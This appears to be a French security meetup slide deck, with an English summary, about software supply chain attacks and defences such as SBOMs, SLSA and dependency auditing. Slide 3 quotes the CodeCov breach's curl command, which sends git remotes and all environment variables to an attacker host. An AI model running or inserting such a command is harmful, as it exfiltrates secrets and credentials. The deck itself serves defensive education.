The document discusses supply chain attacks and recommendations to improve software supply chain security. It notes that supply chain attacks increased over 650% from 2020 to 2021. Examples provided include the SolarWinds/Orion and CodeCov breaches. The document outlines recommendations from Google's Eric Brewer for building secure codebases, including having a single trusted build system, universal library versions, and private repositories. It recommends tools for security component analysis, reducing dependencies, and keeping track of runtime components. Open source responsibilities are compared to adopting a puppy.

1. REX
CraftConf 2022
OWASP France
Meetup juin 2022

2. Supply Chain Attacks
+650%
(Sonatype 2021 report - https://www.sonatype.com/resources/state-of-the-software-supply-chain-2021)

3. Exemples
SolarWinds/Orion
- Initial Access: ???
CodeCov
- OpenSource App de scan de code
- Initial Access: mot de passe dans une
image docker
- Exfiltration: curl -sm 0.5 -d "$(git
remote -v)<<<<<< ENV $(env)"
http://ATTACKERIP/upload/v2 ||
true
https://blog.gitguardian.com/codecov-supply-chain-breach/

4. Google/Eric Brewer
Google ⇒ Nation-grade attackers
- 1 giant codebase
- Single trusted build system
- Proof that code review happened
- Knowledge of authors & reviewers
- Universal libs (same version)
- Private repos

5. Conseils/Outils/Méthodes…
- SCA (npm audit/python safety/…)
- Choisissez / Évaluer vos
dépendances
- Réduire le nombre de
dépendances
- “Update or die”
- SBOM (Dependency Track!) /
Savoir ce qui tourne sur votre
cluster / en production
- Educate!
https://twitter.com/garrows/status/1
065217184643768320?lang=fr

6. (Google) Conseils/Outils/Méthodes…
- SLSA:
https://github.com/slsa-framework/s
lsa
- OpenSSF Security ScoreCards:
https://github.com/ossf/scorecard
- Open Source Insights :
https://deps.dev
- https://osv.dev/

7. OpenSource is like a puppy
Come for free but with responsibility